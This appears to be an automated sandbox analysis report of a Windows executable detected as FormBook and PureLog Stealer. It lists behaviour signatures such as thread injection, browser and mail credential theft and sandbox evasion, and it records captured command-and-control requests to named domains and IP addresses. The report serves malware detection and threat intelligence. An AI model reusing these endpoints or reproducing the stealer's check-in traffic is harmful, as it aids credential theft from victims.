Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1436305
MD5: 4965833a4964d98f4dfaf8f9986199e7
SHA1: 6ab8a932adfc8abae2c4196454f22ed1837d4f20
SHA256: 2ee9df4aa846adb335d5bb9bbae3c279536be3032fc6282cf8501c1ce6ce8364
Tags: exe
Infos:

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: file.exe Avira: detected
Source: http://www.linbreoffice.org/qruc/?4VDXm=Xmo1lInOanbZEZR2FfqxILRU2WQsGTgTYIBV9i+RFmbCb5D19+w35N1Is2bkZ42QIXmVJTObgj0BeJUqj9w3UH0zQTnLJ5Nx1k7nEmCsMeM1HYX8u0brzyzcJ4xyaMAl3g==&aZE=WvFLSf2X7P Avira URL Cloud: Label: malware
Source: http://www.klingerlumberltd.com/qruc/?4VDXm=4y8JdVmVqWeea5bUJhnZt7XNxRE24icx9gyDCHl5L7QB29ig52mkDYCfyusGnjDf+1nAg1jN2XuDrRbFj9LrT3fa2jkqsICyGJZqUuhigsiCWc4bvnqmzxVZ7jHa9xib4Q==&aZE=WvFLSf2X7P Avira URL Cloud: Label: malware
Source: http://www.linbreoffice.org/qruc/ Avira URL Cloud: Label: malware
Source: www.linbreoffice.org Virustotal: Detection: 7% Perma Link
Source: klingerlumberltd.com Virustotal: Detection: 11% Perma Link
Source: http://www.linbreoffice.org/qruc/ Virustotal: Detection: 8% Perma Link
Source: file.exe ReversingLabs: Detection: 42%
Source: file.exe Virustotal: Detection: 55% Perma Link
Source: Yara match File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3271480476.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3270633150.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3271525357.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3271198563.0000000001580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2588306707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2588682104.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3271543512.00000000041E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2590213953.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: file.exe Joe Sandbox ML: detected

Compliance

barindex
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.b60000.0.unpack
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: unlodctr.pdbGCTL source: file.exe, 00000002.00000002.2588802399.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000005.00000002.3271199728.0000000000958000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SIsaiIITJVPvUAG.exe, 00000005.00000002.3271108355.000000000078E000.00000002.00000001.01000000.00000009.sdmp, SIsaiIITJVPvUAG.exe, 00000007.00000000.2655832138.000000000078E000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: wntdll.pdbUGP source: file.exe, 00000002.00000002.2588936794.0000000001070000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000002.3271902920.0000000003110000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000003.2590721651.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000002.3271902920.00000000032AE000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000003.2588637820.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000002.00000002.2588936794.0000000001070000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, unlodctr.exe, 00000006.00000002.3271902920.0000000003110000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000003.2590721651.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000002.3271902920.00000000032AE000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000003.2588637820.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: unlodctr.pdb source: file.exe, 00000002.00000002.2588802399.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000005.00000002.3271199728.0000000000958000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0083B7C0 FindFirstFileW,FindNextFileW,FindClose, 6_2_0083B7C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 4x nop then xor eax, eax 6_2_00829470

Networking

barindex
Source: Traffic Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.5:49715 -> 109.123.121.243:80
Source: DNS query: www.quantumboulevard.xyz
Source: Joe Sandbox View IP Address: 64.225.91.73 64.225.91.73
Source: Joe Sandbox View IP Address: 66.29.135.159 66.29.135.159
Source: Joe Sandbox View IP Address: 109.70.148.57 109.70.148.57
Source: Joe Sandbox View ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
Source: Joe Sandbox View ASN Name: UK2NET-ASGB UK2NET-ASGB
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /qruc/?4VDXm=4y8JdVmVqWeea5bUJhnZt7XNxRE24icx9gyDCHl5L7QB29ig52mkDYCfyusGnjDf+1nAg1jN2XuDrRbFj9LrT3fa2jkqsICyGJZqUuhigsiCWc4bvnqmzxVZ7jHa9xib4Q==&aZE=WvFLSf2X7P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.klingerlumberltd.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /qruc/?4VDXm=UAq9CzGRql0qbxLGxVHqg5bf0CZ8rOmIoC7W/FPBEpHWNGr0R1xACLnBcwEc3ZkTuU45ULwzGu2M7+E0XrmRMVrUBJG+On2qg8sZ5zOyCuxckVT6s8La+RBpo44QBKfh6A==&aZE=WvFLSf2X7P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.gattosat.icuConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /qruc/?4VDXm=Xmo1lInOanbZEZR2FfqxILRU2WQsGTgTYIBV9i+RFmbCb5D19+w35N1Is2bkZ42QIXmVJTObgj0BeJUqj9w3UH0zQTnLJ5Nx1k7nEmCsMeM1HYX8u0brzyzcJ4xyaMAl3g==&aZE=WvFLSf2X7P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.linbreoffice.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /qruc/?4VDXm=TKQjCngekOUXb4wXltIPy/Q8yQpui0ExkVDYFHPguHHgtawi326eHXwL5/LbdhSUHl1rH91YHPKtuSAwSH4DtV2YSv9ONDmHiXuffez2Q2mxtiZmkqRkdVgep2kYHtBckg==&aZE=WvFLSf2X7P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.quantumboulevard.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic DNS traffic detected: DNS query: www.klingerlumberltd.com
Source: global traffic DNS traffic detected: DNS query: www.gattosat.icu
Source: global traffic DNS traffic detected: DNS query: www.linbreoffice.org
Source: global traffic DNS traffic detected: DNS query: www.quantumboulevard.xyz
Source: unknown HTTP traffic detected: POST /qruc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usHost: www.gattosat.icuConnection: closeContent-Length: 206Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Origin: http://www.gattosat.icuReferer: http://www.gattosat.icu/qruc/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoData Raw: 34 56 44 58 6d 3d 5a 43 43 64 42 45 2b 78 67 31 42 4f 46 52 2f 4b 79 48 37 32 79 4c 48 53 34 79 30 77 70 6f 32 73 6c 44 6a 46 32 68 61 61 4c 74 62 6e 4a 31 4b 67 54 77 39 6e 47 4f 4b 5a 63 53 45 4d 6d 49 4a 49 6e 47 55 49 4b 34 74 55 63 34 4f 64 36 50 4a 74 5a 65 48 6a 41 79 33 78 42 65 6d 39 50 33 44 59 67 5a 74 6c 36 43 33 43 46 38 31 6d 6f 58 7a 4a 6b 72 66 7a 38 79 68 4a 70 49 30 36 57 37 6e 74 67 76 68 44 77 4e 2f 72 37 41 2f 76 43 41 50 6f 69 76 30 78 55 56 6b 68 2f 35 42 32 6e 6f 77 5a 6e 6e 7a 68 4b 37 32 38 73 31 63 68 69 6b 47 42 36 32 76 57 50 35 68 5a 2b 2f 4e 74 35 48 31 42 71 79 38 66 78 62 34 3d Data Ascii: 4VDXm=ZCCdBE+xg1BOFR/KyH72yLHS4y0wpo2slDjF2haaLtbnJ1KgTw9nGOKZcSEMmIJInGUIK4tUc4Od6PJtZeHjAy3xBem9P3DYgZtl6C3CF81moXzJkrfz8yhJpI06W7ntgvhDwN/r7A/vCAPoiv0xUVkh/5B2nowZnnzhK728s1chikGB62vWP5hZ+/Nt5H1Bqy8fxb4=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Sat, 04 May 2024 08:08:00 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 04 May 2024 08:08:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 04 May 2024 08:08:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 04 May 2024 08:08:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 04 May 2024 08:08:25 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 04 May 2024 08:08:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 04 May 2024 08:08:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 04 May 2024 08:08:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 04 May 2024 08:08:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: file.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
